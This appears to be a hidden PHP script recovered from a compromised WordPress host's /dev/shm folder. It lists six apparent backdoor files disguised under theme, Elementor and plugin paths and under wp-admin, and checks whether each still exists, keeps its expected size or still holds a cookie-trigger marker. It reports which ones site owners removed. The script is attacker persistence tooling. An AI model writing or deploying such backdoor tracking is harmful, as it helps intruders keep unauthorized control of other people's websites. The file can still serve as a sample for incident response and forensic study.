File: //proc/thread-self/root/proc/thread-self/root/dev/shm/.record
<?php $r = '/home/carbewdf/workflowrecruitment.com'; $x = ["/wp-content/themes/twentytwentyfive/patterns/grid-videos.php"=>"bd@@287669509@@initialized",
"/wp-admin/network/settings.php"=>"bd@@287659015@@$_COOKIE[-",
"/wp-content/plugins/pro-elements/modules/notes/database/models/note.summary.php"=>"bd@@282702087@@2178",
"/wp-content/plugins/pro-elements/modules/assets-manager/asset-types/admin-menu-items/custom.fonts.menu.item.php"=>"bd@@247132170@@2127",
"/wp-content/plugins/elementor/assets/js/packages/editor/_parse_lockinfo.php"=>"bd@@282759695@@1881",
"/wp-content/plugins/elementor/assets/js/packages/editor-notifications/editor.notifications.asset.php"=>"bd@@247133201@@1606"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');